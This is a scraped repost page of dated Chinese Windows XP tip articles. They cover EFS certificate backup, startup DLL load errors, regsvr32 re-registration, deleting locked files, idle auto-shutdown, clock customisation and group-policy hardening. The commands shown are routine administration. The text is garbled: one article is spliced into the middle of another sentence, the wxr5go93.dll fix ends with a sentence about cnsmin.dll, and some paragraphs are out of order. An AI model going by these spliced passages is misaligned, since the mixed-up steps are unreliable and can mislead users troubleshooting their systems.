步骤八:单击“预期目的”栏中显示“加密文件”字样的证书。 步骤九:右键单击该证书，指向“所有任务”，然后单击“导出”。 步骤十:按照证书导出向导的指示 将证书及相关的私钥以PFX文件格式导出(注意:推荐使用“导出私钥”方式导出，这样可以保证证书受密码保护，以防别人盗用。另外，证书只能保存到你有读写权限的目录下)。 4.保存好证书 注意将PFX文件保存好。以后重装系统之后无论在哪个用户下只要双击这个证书文件，导入这个私人证书就可以访问NTFS系统下由该证书的原用户加密的文件夹(注意:使用备份恢复功能备份的NTFS分区上的加密文件夹是不能恢复到非NTFS分区的)。 最后要提一下，这个证书还可以实现下述用途: (1)给予不同用户访问加密文件夹的权限 将我的证书按“导出私钥”方式导出，将该证书发给需要访问这个文件夹的本机其他用户。然后由他登录，导入该证书，实现对这个文件夹的访问。 (2)在其也WinXP机器上对用“备份恢复”程序备份的以前的加密文件夹的恢复访问权限 将加密文件夹用“备份恢复”程序备份，然后把生成的Backup.bkf连同这个证书拷贝到另外一台WinXP机器上，用“备份恢复”程序将它恢复出来(注意:只能恢复到NTFSWindows加载项错误集合 2009-02-08 15:50:39 被33人转藏 | 小贴士:史上最牛的脑筋急转弯,敢来挑战么, Windows加载项错误集合 当在系统中频繁安装和卸载一些应用程序，或者频繁对系统进行杀毒操作的话，系统在日后的启动过程中可能会出现相关内容无法加载的尴尬现象。当我们不小心遭遇这样的尴尬现象时，系统启动效率将会受到明显影响;为了提高系统启动效率，本文下面就将一些常见的启动加载错误总结出来，并对它们提出相应的解决办法，希望这些内容能对各位有用! 1、让系统摆脱cnsmin.dll无法加载尴尬 当系统中安装过3721软件，之后又没有正确将它从系统中卸载干净的话，那么系统在日后的启动过程中，可能会遇到cnsmin.dll加载失败的故障提示，面对这种故障提示，我们可以按照下面的操作方法来尝试让系统摆脱cnsmin.dll无法加载的尴尬: 首先依次单击系统桌面中的“开始”/“运行”命令，在弹出的系统运行对话框中，输入字符串命令“msconfig”，单击回车键后，打开系统的实用程序配置窗口; 其次单击该配置窗口中的“启动”标签，然后在对应的标签页面，检查一下该页面中的“cnsmin”项目是否处于选中状态，一旦选中的话必须及时将它取消选中，再单击“确定”按钮，最后重新启动一下计算机系统，相信这么一来系统就不会出现cnsmin.dll无法加载的尴尬了; 如果上面的方法还无法让系统摆脱cnsmin.dll无法加载尴尬的话，我们可以依次单击系统桌面的“开始”/“运行”命令，在弹出的系统运行对话框中，输入字符串命令“regedit”，单击“确定”按钮后，打开本地系统的注册表编辑窗口; 在该编辑窗口的左侧列表区域，将鼠标定位于 “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”注册表子键，然后将该子键下面的3721加载项删除掉，再刷新一下系统注册表接就可以让系统摆脱cnsmin.dll无法加载的尴尬了。 2、让系统摆脱cmicnfg.cpl无法加载尴尬 有时候系统在启动的过程中会碰到cmicnfg.cpl加载错误的故障提示，同时系统还弹出找不到指定模块的提示，系统之所以会出现这种启动加载尴尬，多半是我们平时不按照正确顺序关闭计算机系统，或者随意使用工具程序对磁盘分区容量进行调整时造成系统文件发生丢失引起的。要想让系统摆脱cmicnfg.cpl无法加载尴尬，我们可以进行下面的尝试操作: 首先用鼠标右键单击系统桌面中的“我的电脑”图标，从弹出的快捷菜单中执行“属性”命令，打开系统的属性设置窗口，单击该窗口中的“硬件”标签，并在对应标签页面中单击“设备管理器”按钮，打开系统的设备列表窗口; 用鼠标展开该窗口中的“声音、视频和游戏控制器”项目，然后用鼠标右键单击该分支项目下面的指定声卡设备，从弹出的快捷菜单中执行“卸载”命令，这样一来声卡设备的驱动程序就被自动从系统中彻底卸载干净了; 紧接着将Windows系统的安装光盘放置到物理光驱中，并依次单击系统桌面中的“开始”/“运行”命令，在弹出的系统运行文本框中输入字符串命令“sfc /scannow”，单击回车键后，系统就会自动执行系统文件的修复操作;等到修复 操作结束后，将Windows系统的安装光盘从物理光驱中取出来，同时重新启动一下计算机系统，之后再将声卡驱动程序重新安装一下，这么一来cmicnfg.cpl无法加载的故障提示就会被消除了。 3、让系统摆脱soundmix.dll无法加载尴尬 当系统在启动的时候不小心遭遇到soundmix.dll无法加载的故障现象时，我们可以尝试使用下面的方法来让系统摆脱这种启动加载尴尬: 首先按下Ctrl+Alt+Del复合键，打开系统的任务管理器窗口，单击该窗口中的“进程”标签，并在对应标签页面中检查一下是否有自己不熟悉的可疑进程，要是发现的话我们必须先将它们结束掉; 其次依次单击系统桌面的“开始”/“运行”命令，在弹出的系统运行对话框中，输入字符串命令“regedit”，单击“确定”按钮后，打开本地系统的注册表编辑窗口; 接下来单击该编辑窗口菜单栏中的“编辑”选项，从弹出的下拉菜单中执行“查找”命令，打开查找对话框，选中其中的“项”、“值”以及“数据”复选项，同时在“查找目标”文本框中输入“soundmix.dll”，再单击“查找下一个”按钮，这样系统就会自动将与“soundmix.dll”相关的键值全部找出来，将这些找到键值或数据全部删除掉，最后重新启动一下计算机系统，就能让系统摆脱soundmix.dll无法加载的尴尬了。 4、让系统摆脱wxr5go93.dll无法加载尴尬 如果我们在启动系统的过程中，遇到 “X:\Windows\Downlo~l\wxr5go93.dll”无法加载的错误提示时，可以考虑使用下面的方法来解决该故障提示: 首先依次单击系统桌面中的“开始”/“运行”命令，在弹出的系统运行对话框中，输入字符串命令“msconfig”，单击回车键后，打开系统的实用程序配置窗口; 其次将该配置窗口“一般”标签页面中的“有选择的启动”项目选中，同时将“加载系统服务”也选中，并把其他项目的选中状态全部取消; 接着单击“服务”标签，打开如图4所示的标签页面，并将其中的“隐藏所有Microsoft服务”项目选中，同时把其他项目的选中状态全部取消，再单击“确定”按钮，最后重新启动一下计算机系统，相信这么一来系统就不会出现cnsmin.dll无法加载的尴尬了。 分区)。然后导入证书，即可访问恢复出来的文件了。 重新注册DLL 修复Windows操作系统故障 2009-02-08 15:49:57 被57人转藏 | 小贴士:你不理财，财不理你:理财从头学起 重新注册DLL 修复Windows操作系统故障 如果DLL文件的注册表项(Registry entry)遭到破坏，那么打开文件或网页时，操作系统就会运行缓慢或者无法正常运行。幸运的是，来自俄亥俄州Dayton的高手Dick Waller告诉我们，Windows自带的regsvr32.exe工具能重新在注册表中添加DLL数据。 Windows XP和2000会在文件中保存有关其功能的信息，这些文件就是动态链接库(DLL)。有关DLL信息则保存在Windows注册表中。如果DLL文件的注册表项(Registry entry)遭到破坏，那么打开文件或网页时，操作系统就会运行缓慢或者无法正常运行。幸运的是，来自俄亥俄州Dayton的高手Dick Waller告诉我们，Windows自带的regsvr32.exe工具能重新在注册表中添加DLL数据。 即使你无法确定哪些DLL信息丢失或被破坏，也不会影响重新注册随Windows安装的DLL。对于由损坏的DLL注册表项引起的常见问题，下面的方法或许可以修复。 “快捷方式”)以及修复非常容易损坏的文件夹图标双击功能。， 很多问题通过重新注册Shell32.dll文件就能简单地得到修复，Shell32.dll保存有关Windows界面的信息，并被用来打开文件和网页。例如，重新安装这个DLL文件能在桌面“图形选项”对话框下重新保存JPEG或GIF图片预览(右击桌面，选择“选项”就能看到对话框)。它同时还能修复启动“新建快捷方式向导”功能(右击桌面，选择“新建” 若想重新保存这个DLL文件，选择“开始”\“运行”，键入regsvr32 /i shell32.dll，按回车键。会有信息提示你这个命令是否生效(不过得重启电脑)。 重新保存Windows XP图片和传真浏览器。如果双击文件图标不能浏览图片或传真，可以重新注册浏览器的DLL。选择“开始”\“运行”，键入regsvr32 /i shimgvw.dll，按回车键。同样的，会有信息弹出提示这个DLL是否已经修复了这个问题。 激活XP中的“添加网络空间向导”。有时重新保存一个破损的功能要求数次运行regsvr32 /i命令，每个需要重新保存数据的DLL都应运行一次。例如，如果在“我的网络空间”文件夹窗口左侧面板内点击“添加网络空间”但毫无反应的情况下，你在Windows“运行”栏内依次运行三个命令就能重新激活“我的网络空间”。操作是:选择“开始”\“运行”，键入regsvr32 /i netplwiz.dll，按回车键。接下来相同操作，键入regsvr32 /i mshtml.dll命令行，最后运行regsvr32 /i shell32.dll命令行。 重新保存快速启动栏。如果在任务栏右击，选择“工具栏”\“快速启动栏”，只能收到一条错误信息提示说工具栏未能建立，你可能丢失了快速启动栏文件夹、注册表项或其他重要的文件。快速启动栏文件夹应该在C:\Documents and Settings\profile name\Application Data\Microsoft\Internet Explorer 中。如果没有，你可以手动创建(点击“文件”\“新建”，在刚刚提到的这个文件夹中新建一个文件夹，并命名为快速启动栏)，也可以让Windows进行这项操作，操作是:选择“开始”\“运行”，键入ie4uinit.exe，按回车键。试试是否能显示快速启动栏。 如果仍然没有反应，选择“开始”\“运行”，键入regsvr32 /i shell32.dll，按回车键。然后，点击“开始”\“运行”，键入regsvr32 /i browseui.dll，按回车键。 关于删除“删不掉”的文件的补充 2009-02-08 15:49:19 被88人转藏 | 小贴士:测试:你对别人的重要性和利用率 关于删除“删不掉”的文件的补充 在Windows系统中，我们难免会遇到用常规方法无法删除文件的情况。尤其是使用Windows XP系统的用户，遭遇此类问题的频率更高。为了解除用户的困惑，我们将尝试通过各种非常规的手段有效地删除那些顽固文件。 一、删除顽固文件的常规方法 1.重新启动Windows操作系统后，再按常规方式删除文件。 2.在DOS(或命令提示符)界面中用Del、Deltree之类的命令删除。 3.利用非Windows资源管理器的第三方工具删除，例如具有浏览文件夹功能 的Total Commander、ACDSee、FlashFXP、Nero等软件。 4.如果你安装了两个以上的操作系统，那么就可以在当前系统中删除其它操作系统的文件。 5.在启动时按F8键选择进入安全模式执行删除操作。 二、删除“其它程序正在使用”的文件 问题表现: Windows XP系统中，准备删除一个大容量的AVI格式文件，但系统却总是提示无法执行删除操作，有别的程序在使用，即使刚开机进入Windows系统时也是如此。 问题解决: 方法1:打开记事本，点击菜单栏“文件”?“另存为”，命名文件和你想删除的那个文件名一致(包括扩展名)，而后进行替换，会发现容量变为0 KB了。此时，执行删除命令即可。 方法2:在那个AVI文件同目录中新建一个文件夹，然后重新启动。现在，不要选那个AVI文件，先选择适才新建的文件夹，然后再同时按Ctrl键+那个AVI文件，执行删除操作。 方法3:把AVI文件的扩展名改为其它任意无效的文件类型，再执行删除操作。 方法4:有一个一劳永逸的方法就是禁用Windows XP的媒体预览功能，点击“开始”?“运行”，输入:“CMD”后回车。然后在“命令提示符”窗口下输入:regsvr32 /u shmedia.dll 回车确认操作后将卸载视频文件的预览功能。以后在需要恢复视频文件预览功能时，在“命令提示符”中输入:regsvr32 shmedia.dll命令即可。 方法5:启动曾播放过那个AVI文件的媒体播放器，打开另一个文件。此后，再尝试删除即可。 方法6:可用WinRAR程序删除，用鼠标右键单击那个AVI文件，在弹出菜单中选择“添加到压缩文件”，而后在弹出窗口的“常规”标签页中选择“压缩后删除源文件”复选框。确认操作后，执行压缩操作。最后再删除该压缩文件。 方法7:调出“Windows任务管理器”，在其中选择结束Explorer进程，但此时不要关闭该窗口。这时候，会出现像死机一样的状况。我们切换到“应用程 序”标签页，点击“新任务”按钮，输入Explorer.exe 并确认操作。此后，桌面又恢复正常了，再执行删除操作即可。 三、巧妙删除“非空文件夹”或“坏文件” 问题表现: 在Windows XP系统下(NTFS分区格式)，无论是在资源管理器还是用第三方工具都删除不了指定文件，例如用Total Commander删除，先提示文件夹非空，确认后没任何反应。即使用DOS盘启动，加载ntfs for dos pro可读写版本，也删除不了，提示说是“坏的文件名”，但是可以看到该文件夹。 问题解决: 这种情况下的文件无法删除很有可能是由于在NTFS格式下长文件名造成的。我们可以使用8.3格式缩小长度或更改路径中部分目录名以减少路径的长度。例如可以暂时把路径中某些目录改名字，或在命令行模式下使用8.3格式。例如，“Linux Faq”的目录变成8.3就是“LINUXF~1”了，通过“Linuxf~1” 就能进入目录了，此后就可以使用Del命令删除指定文件了。如果需要删除目录，则使用Rd命令。 四、巧妙删除“指定程序或文件正在使用”的文件 问题表现: 在执行删除文件操作时，系统在弹出对话框中提示指定程序或文件正在使用，无法删除之类的警告信息。 问题解决: 方法1:对于此类情况，我们可通过结束预删除文件的相关进程来解决问题。那么，如何能获知指定文件与哪些进程相关联呢?可以使用WhoLockMe这款小工具一探究竟。我们运行“Install.exe”先安装该程序。 下面，进入预删除文件所在目录，用鼠标右键单击该文件，在弹出菜单中选择“Who Lock Me?”。 这时会弹出“Lockers”窗口，在其中我们可以获知当前所有调用该文件的进程。 选定其中的进程名称后，点击“Kill Process”按钮，弹出“Kill-Confirmation”对话框，在此点击“是”按钮确认结束进程操作即可。结束所有相应进程后，就可以通过正常途径删除指定文件了。 小提示:其实这种方法尤其适用于删除木马服务器，这种极有威胁性的小东东只有封杀了与其相关的所有进程后才能删除。 方法2:如果指定程序或文件所调用的DLL动态链接库文件还在内存中未释放，删除时也会提示文件正在使用。这种情况下，我们在DOS环境中删除系统的页面文件即可，Windows 9X系统中是“WIN386.SWP”文件(位于系统盘的Windows目录中)，Windows 2000/XP系统中是“pagefile.sys”文件(位于系统盘根目录下)。 方法3:如果系统中常驻病毒防火墙，而它在扫描查毒时正在检查你准备删除的文件，那么系统也会提示文件正在使用。此时，我们只需要暂停实时监控操作即可。 五、巧妙删除其它类别的怪文件 1.用户权限问题导致无法删除文件 如果当前的Windows用户登录身份不具有删除指定文件/文件夹的权限(针对Windows NT/2000/XP/2003操作系统)，只要重新以管理员身份登录即可。 2.非法字符导致文件或文件夹无法删除 如果是由于非法字符导致文件或文件夹无法删除，可以在“命令提示符”界面中进入要删除文件的目录，输入“dir>del.bat”，利用DOS的管道命令把当前目录的文件列表自动输入到批处理命令文件“del.bat”中，然后修改该批命令文件，仅保留文件或目录名，并在文件或者目录名称前增加“del ”或者“rd”，然后运行批处理命令即可删除。 3.无法删除系统中的任何文件 查看系统中是否安装了具有反删除功能的防护软件，如果是则将其删除即可 有备而来 让Windows寻找文件不再迷茫 2009-02-08 15:48:41 被33人转藏 | 小贴士:测试:你的内心到底偏男偏女, 有备而来 让Windows寻找文件不再迷茫 无论是在办公还是在上网，我们明明已经保存好了文件或下载好了文件，可是日后再去找它们时，却怎么也寻找不到了。这种现象在许多电脑新手面前常常会发生，引起这种现象的直接原因就是电脑新手不熟悉系统或应用程序的默认保存路径，很显然，这种现象会严重影响新手的电脑操作效率。为了提高电脑操作效率，让寻找文件不再迷茫，我们不但需要熟悉系统以及常见应用程序的文档默认保存位置，还需要有备而来对系统或程序进行合适设置，让目标文档自动归位保存! 1、提前下手，让保存位置由我作主 每次用Word、Excel之类的应用程序编辑好文档后，多数人都会随手单击一下工具栏中的“保存”按钮将当前文档保存起来;可是过一段时间后，再想将以前编辑过的文档找出来看看时，却怎么也找不到了!也许你会说打开系统的文件搜索对话框，输入需要查找的目标文档相关关键词，然后执行搜索命令不就能快速找到目标文档了嘛!话是不错，不过要是我们记不得目标文档的关键词时，我们该如何从百十个GB的硬盘中快速找到目标文档呢? 事实上，我们根本不需要这么麻烦去寻找文件，只要弄清楚Word、Excel之类的应用程序在执行“保存”命令后，它会自动将当前文档保存在什么位置就可以了，以后只需要到指定的位置处，就能轻而易举地找到以前编辑过的各种文档了。在默认状态下，Word、Excel会将文档存储在“C:\Documents and Settings\user\My Documents”文件夹中(其中user表示登录Windows系统的当前用户帐号)，我们只要进入该文件夹中就能找到所有按默认设置保存好的文档文件。考虑到该文件夹是存储在系统分区下面，一旦系统发生瘫痪或者重新安装操作系统的话，那么以前的各种Word、Excel文档都有丢失的危险，因此我们必须为Word、Excel程序重新指定保存路径，让各种工作文档全部自动保存到系统分区以外的指定位置，以后我们就能直接到指定位置处，轻松查看到各种工作文档了。在指定Word、Excel程序的默认保存位置时，可以按照如下步骤来操作: 首先打开“我的电脑”窗口，进入系统分区以外的磁盘分区窗口中，然后在该分区根目录下面创建一个专门用来存储各种Word、Excel文档的文件夹，例如这里我们假设在E盘下面创建了一个“工作材料”的文件夹; 其次运行Word或Excel应用程序，并在其编辑界面的菜单栏中依次单击“工具”/“选项”命令，在其后弹出的选项设置界面中单击“文件位置”标签，打开标签页面; 在该页面的“文件类型”列表处，选中“文档”项目，然后单击“修改”按钮，在其后弹出的修改位置对话框中，将前面创建好的“E:\工作材料”文件夹选中并导入进来，并单击一下“确定”按钮返回到图1标签页面中，最后再单击“确定”按钮，这样一来我们以后再执行“保存”命令时，当前编辑的文档材料就会自动被存储在“E:\工作材料”文件夹中了，以后我们直奔“E:\工作材料”文件夹就能将以前编辑过的所有文档尽收眼底了。 2、预先设置，让解压文件直达目标 从网上下载得到的许多文件都是RAR格式的压缩包文件，不少菜鸟朋友都喜欢通过双击WinRAR程序窗口中的目标文件来进行解压，可是四处搜寻都找不到解压出来的文件。事实上，当我们通过双击鼠标的方法来解压文件时，目标文件往往被自动释放到“C:\Documents and Settings\user\My Documents”文件夹中(其中user表示登录Windows系统的当前用户帐号)，只要进入上述文件夹中就能找到从压缩包中释放出来的文件了。但由于打开上面的文件夹比较麻烦，不方便快速寻找解压文档，因此我们完全可以自定义一个快速直达的释放路径，以便提高文件寻找效率，下面就是自定义释放路径的具体操作步骤: 首先打开“我的电脑”窗口，进入系统分区以外的磁盘分区窗口中，然后在该分区根目录下面创建一个专门用来存储各种解压文档的文件夹，比方说我们在E盘下面创建了一个“解压文件”的文件夹; 其次运行WinRAR程序，并在其工作界面中依次单击菜单栏中的“选项”/“设置”命令，在其后弹出的设置窗口中，单击“压缩”标签，打开标签页面; 在该页面的“解压文件的默认文件夹”文本框中，将缺省的“C:\Documents and Settings\user\My Documents”释放路径删除掉，然后再将前面已经指定好的“E:\解压文件”路径填写在这里，再单击“确定”按钮，这样一来日后我们再用鼠标双击压缩包中的文件时，该文件就会被自动释放到“E:\解压文件”中了，到时我们只要直达“E:\解压文件”就能找到解压文件的“身影”了。当然，在这里我们也可以为新创建的压缩包文件指定一个合适的保存文件，以后新建的压缩文件就能自动被整理到指定位置了。 3、修改属性，让下载文档自动归位 为了提高文件的下载速度，不少人都“请来”了网际快车这样的专业下载工具来帮忙，可是下载完毕后他们竟然不知道到什么位置去寻找被下载下来的文件。其实，网际快车程序在默认状态下会将下载下来的文件自动保存在“C:\Download”下面的各个子类文件夹中，我们到时只需进入“C:\Download”文件夹就能快速搜寻到目标下载文件了。 由于该默认保存路径也是位于系统分区中，随着下载文件的数量逐步增多，C盘空间资源将会被逐步耗尽，这样一来计算机系统的整体运行效率就会受到影响，为此我们不妨通过修改下载属性的方法，来将下载文档自动存储到系统分区以外的指定路径处，下面就是该方法的具体实现步骤: 首先打开“我的电脑”窗口，进入系统分区以外的磁盘分区窗口中，然后在该分区根目录下面创建一个专门用来存储各种下载文件的文件夹，比方说我们在F盘下面创建了一个“下载内容”的文件夹; 其次运行网际快车程序，并在对应的程序界面中依次执行“工具”/“默然下载 属性”命令，在随后出现的属性设置界面中，将事先创建好的“F:\下载内容” 路径信息填写在“另存到”文本框中，再单击一下“确定”按钮，如此一来网际快车程序就能将各类下载文档自动归类保存，到时我们寻找下载文件就不会是一脸茫然了! 4、有的放矢，让网页文件尽收眼底 “来也匆匆，去也匆匆”，在来去匆匆的浏览网页过程中，我们有时会对以前浏览过的网页内容突然产生兴趣，并想将其中的内容“据为己有”，但无奈当时浏览速度太快而没来得及记下网址，那该如何将以前访问过的网页中的内容寻找到手呢?事实上，只要被IE打开过的网页内容都会自动保存在系统的临时目录“C:\Documents and Settings\user\Local Settings\Temporary Internet Files”文件夹中(其中user表示登录Windows系统的当前用户帐号)，我们只要进入上述临时文件夹窗口，就能遍览最近访问过的网页中的所有内容了;然后根据访问时间的先后或文件类型的不同，我们就可以快速找到自己需要的内容，最后再将找到的目标内容保存到本地硬盘的其他目录中，就可以将指定内容“据为 己有”了。 Windows:我不在 你自动关机 2009-02-08 15:48:08 被102人转藏 | 小贴士:测试:你最真实的一面(很准哦) Windows:我不在 你自动关机 利用Windows操作系统中的任务计划，自动检测用户是不是在使用电脑，如果用户在特定的时间内没有使用电脑，则自动调用关机命令，关闭计算机。如果他人要使用电脑则必须知道在BIOS中设置的“开机密码” 许多人经常会遇到这样一种情况:在使用电脑的过程中，临时有事需要去处理一下，如果能让电脑自动检测，我们很长时间没有回来的话自动关闭电脑，无疑是最好的计算机管理方法。 实现原理 利用Windows操作系统中的任务计划，自动检测用户是不是在使用电脑，如果用户在特定的时间内没有使用电脑，则自动调用关机命令，关闭计算机。如果他人要使用电脑则必须知道在BIOS中设置的“开机密码”。 实现方法 第1步 在桌面上单击右键，从弹出的右键菜单中选择“创建快捷方式”， 然后在弹出的“创建快捷方式”对话框中输入命令。如果你用的操作系统是Windows 98，输入“rundll32.exe user.exe，exitwindows”;如果你用的操作 系统是Windows 2000/XP/2003，输入“shutdown.exe -s -f -t 10 -c '主人不在，即将关机'”。在接下来的命名对话框中将此快捷方式命名为“ShutdownComputer”。 第2步 依次单击“开始?所有程序?附件?系统工具?任务计划”，打开“任务计划”窗口，拖动桌面上的快捷方式到“任务计划”窗口中。 第3步 双击“任务计划”窗口中的“ShutdownComputer”快捷方式，在弹 出的窗口中点“日程安排”选项卡，单击“计划任务”下拉式列表框，从中选择“空闲时”，在“当计算机空闲时间超过XX分钟处将时间间隔改为你认为合适的时间间隔，比如25分钟，如图所示。建议将时间间隔设为15~30分钟，因为设置的时间过短，反复开关机会影响计算机寿命，设置的时间太长则无法达到保护我们系统的目的。 第4步 单击“设置”选项卡，清空所有对话框前的复选框，单击“确定”按钮。 ?博弈圣 ?更 让XP系统的时间显示充满个性 2009-02-08 15:47:34 被65人转藏 | 小贴士:你不理财，财不理你:理财从头学起 让XP系统的时间显示充满个性 每天面对着XP系统一成不变的时间显示，您有没有觉得它有点过于呆滞、死板，下面让我们一起来给它来一次改头换面吧。 在控制面板中双击“日期、时间、区域与语言选项”，在打开的“区域和语言选项”的窗口中点击“自定义”按钮，再在打开的“自定义选项”对话框中，单击“时间”选项卡，在中间的“时间格式”框中选择“tt hh:mm:ss”格式，“AM符号(M)”框中选择上午，并紧接着转输入法改成你想要显示的字符。再在“PM符号(M)”框中选择下午，也改成你想要显示的字符。根据窗口下边的提示，t代表上午或下午，这里的AM代表上午， PM代表是下午，而我们只不过是人为的把上午和下午这两个词偷梁换柱罢了，也就是说你可以让它上下午显示不同的内容，但最多只能输入8个汉字，最后点击“确定”按钮一路退出。这时我们就会发现XP的的上下午时间分别显示成了我们输入的文字。 如果想把加出的提示信息放到时间的后面，可以在“时间格式”框中把“tt hh:mm:ss”格式，手动改为“hh:mm:ss tt”也在就是把tt这两个字母搬到后边去，并在其前面加了1个空格(为了好看，不然时间提示信息紧挨着)。这样提示 信息就排到时间的后面去了。 防范非法用户入侵Win 2K/XP系统七招 2009-02-08 15:47:01 被43人转藏 | 小贴士:测测你是不是娱乐八卦狂人? 防范非法用户入侵Win 2K/XP系统七招 第一招:屏幕保护 在Windows中启用了屏幕保护之后，只要我们离开计算机(或者不操作计算机)的时间达到预设的时间，系统就会自动启动屏幕保护程序，而当用户移动鼠标或敲击键盘想返回正常工作状态时，系统就会打开一个密码确认框，只有输入正确的密码之后才能返回系统，不知道密码的用户将无法进入工作状态，从而保护了数据的安全。 提示:部分不完善的屏幕保护程序没有屏蔽系统的“Ctrl+Alt+Del”的组合键，因此需要设置完成之后测试一下程序是否存在这个重大Bug。 不过，屏幕保护最快只能在用户离开1分钟之后自动启动，难道我们必须坐在计算机旁等待N分钟看到屏幕保护激活之后才能再离开吗?其实我们只要打开Windows安装目录里面的system子目录，然后找到相应的屏幕保护程序(扩展名是SCR)，按住鼠标右键将它们拖曳到桌面上，选择弹出菜单中的“在当前位置创建快捷方式”命令，在桌面上为这些屏幕保护程序建立一个快捷方式。此后，我们在离开计算机时双击这个快捷方式即可快速启动屏幕保护。 第二招:巧妙隐藏硬盘 在“按Web页”查看方式下，进入Windows目录时都会弹出一句警告信息，告诉你这是系统文件夹如果“修改该文件夹的内容可能导致程序运行不正常，要查看该文件夹的内容，请单击显示文件”，这时单击“显示文件”就可以进入该目录了。原因是在Windows根目录下有desktop.ini和folder.htt两个文件作祟。将这两个文件拷贝到某个驱动器的根目录下(由于这两个文件是隐藏文件，之前必须在文件夹选项中单击“查看”标签，选择“显示所有文件”，这样就可以看见这两个文件了)。再按“F5”键刷新一下，看看发生了什么，是不是和进入Windows目录时一样。 接下来我们用“记事本”打开folder.htt，这是用HTML语言编写的一个文件，发挥你的想像力尽情地修改吧。如果你不懂HTML语言也没关系，先找到“显示文件”将其删除，找到“修改该文件夹的内可能导致程序运行不正常，要查看该文件夹的内容，请单击显示文件”，将其改为自己喜欢的文字，例如“安全重地，闲杂人等请速离开”，将“要查看该文件夹的内容，请单击”改为“否则，后果自负!”，接着向下拖动滑块到倒数第9行，找到 “(file://%TEMPLATEDIR%\wvlogo.gif)”这是显示警告信息时窗口右下角齿轮图片的路径，将其改为自己图片的路径，例如用“d:\tupian\tupian1.jpg”替换“//”后面的内容，记住这里必须将图片的后缀名打出，否则将显示不出图片。当然，你还可以用像Dreamweaver、FrontPage这样的网页工具做出更好的效果，然后只要将原文件拷贝到下面这段文字的后面，覆盖掉原文件中“,”之间的内容就可以了。 *This file was automatically generated by Microsoft Internet EXPlorer 5.0 *using the file %THISDIRPATH%\folder.htt. 保存并退出，按“F5”键刷新一下，是不是很有个性?接下来要作的就是用“超级兔子”将你所要的驱动器隐藏起来，不用重新启动就可以欣赏自己的作品了。最后告诉大家一招更绝的，就是干脆将folder.htt原文件中“,”之间的内容全部删除，这样就会给打开你的驱动器的人造成一种这是一个空驱动器的假象，使其中的文件更安全。 第三招:禁用“开始”菜单命令 在Windows 2000/XP中都集成了组策略的功能，通过组策略可以设置各种软件、计算机和用户策略在某种方面增强系统的安全性。运行“开始?运行”命令，在“运行”对话框的“打开”栏中输入“gpedit.msc”，然后单击“确定”按钮即可启动Windows XP组策略编辑器。在“本地计算机策略”中，逐级展开“用户配置?管理模板?任务栏和开始菜单”分支，在右侧窗口中提供了“任务栏”和“开始菜单”的有关策略。 在禁用“开始”菜单命令的时候，在右侧窗口中，提供了删除“开始”菜单中的公用程序组、“我的文档”图标、“文档”菜单、“网上邻居”图标等策略。清理“开始”菜单的时候只要将不需要的菜单项所对应的策略启用即可，比如以删除“我的文档”图标为例，具体操作步骤为: 1)在策略列表窗口中用鼠标双击“从开始菜单中删除我的文档图标”选项。 2)在弹出窗口的“设置”标签中，选择“已启用”单选按钮，然后单击“确定”即可。 第四招:桌面相关选项的禁用 Windows XP的桌面就像你的办公桌一样，有时需要进行整理和清洁。有了组策略编辑器之后，这项工作将变得易如反掌，只要在“本地计算机策略”中展开“用户配置?管理模板?桌面”分支，即可在右侧窗口中显示相应的策略选项。 1)隐藏桌面的系统图标 倘若隐藏桌面上的系统图标，传统的方法是通过采用修改注册表的方式来实现，这势必造成一定的风险性，采用组策略编辑器，即可方便快捷地达到此目的。 若要隐藏桌面上的“网上邻居”和“Internet EXPlorer”图标，只要在右 侧窗口中将“隐藏桌面上网上邻居图标”和“隐藏桌面上的Internet EXPlorer 图标”两个策略选项启用即可。如果隐藏桌面上的所有图标，只要将“隐藏和禁用桌面上的所有项目”启用即可。当启用了“删除桌面上的我的文档图标”和“删除桌面上的我的电脑图标”两个选项以后，“我的电脑”和“我的文档”图标将从你的电脑桌面上消失了。如果在桌面上你不再喜欢“回收站”这个图标，那么也可以把它给删除，具体方法是将“从桌面删除回收站”策略项启用。 2)禁止对桌面的某些更改 如果你不希望别人随意改变计算机桌面的设置，请在右侧窗口中将“退出时不保存设置”这个策略选项启用。当你启用这个了设置以后，其他用户可以对桌面做某些更改，但有些更改，诸如图标和打开窗口的位置、任务栏的位置及大小在用户注销后都无法保存。 第五招:禁止访问“控制面板” 如果你不希望其他用户访问计算机的控制面板，你只要运行组策略编辑器，并在左侧窗口中展开“本地计算机策略?用户配置?管理模板?控制面板”分支，然后将右侧窗口的“禁止访问控制面板”策略启用即可。 此项设置可以防止控制面板程序文件的启动，其结果是他人将无法启动控制面板或运行任何控制面板项目。另外，这个设置将从“开始”菜单中删除控制面板，同时这个设置还从Windows资源管理器中删除控制面板文件夹。 提示:如果你想从上下文菜单的属性项目中选择一个“控制面板”项目，会出现一个消息，说明该设置防止这个操作。 第六招:设置用户权限 当多人共用一台计算机时，在Windows XP中设置用户权限，可以按照以下步骤进行: 1)运行组策略编辑器程序。 2)在编辑器窗口的左侧窗口中逐级展开“计算机配置?Windows设置?安全设置?本地策略?用户权限指派”分支。 3)双击需要改变的用户权限，单击“添加用户或组”按钮，然后双击想指派给权限的用户账号，最后单击“确定”按钮退出。 第七招:文件夹设置审核 Windows XP可以使用审核跟踪用于访问文件或其他对象的用户账户、登录尝试、系统关闭或重新启动以及类似的事件，而审核文件和NTFS分区下的文件夹可以保证文件和文件夹的安全。为文件和文件夹设置审核的步骤如下: 1)在组策略窗口中，逐级展开右侧窗口中的“计算机配置?Windows设置?安全设置?本地策略”分支，然后在该分支下选择“审核策略”选项。 2)在右侧窗口中用鼠标双击“审核对象访问”选项，在弹出的“本地安全策略设置”窗口中将“本地策略设置”框内的“成功”和“失败”复选框都打上勾选标记，然后单击“确定”按钮。 3)用鼠标右键单击想要审核的文件或文件夹，选择弹出菜单的“属性”命令，接着在弹出的窗口中选择“安全”标签。 4)单击“高级”按钮，然后选择“审核”标签。 5)根据具体情况选择你的操作: 倘若对一个新组或用户设置审核，可以单击“添加”按钮，并且在“名称”框中键入新用户名，然后单击“确定”按钮打开“审核项目”对话颉?/P> 要查看或更改原有的组或用户审核，可以选择用户名，然后单击“查看/编 辑”按钮。 要删除原有的组或用户审核，可以选择用户名，然后单击“删除”按钮即可。 6)如有必要的话，在“审核项目”对话框中的“应用到”列表中选取你希望审核的地方。 7)如果想禁止目录树中的文件和子文件夹继承这些审核项目，选择“仅对此容器内的对象和/或容器应用这些审核项”复选框。 注意:必须是管理员组成员或在组策略中被授权有“管理审核和安全日志”权限的用户可以审核文件或文件夹。在Windows 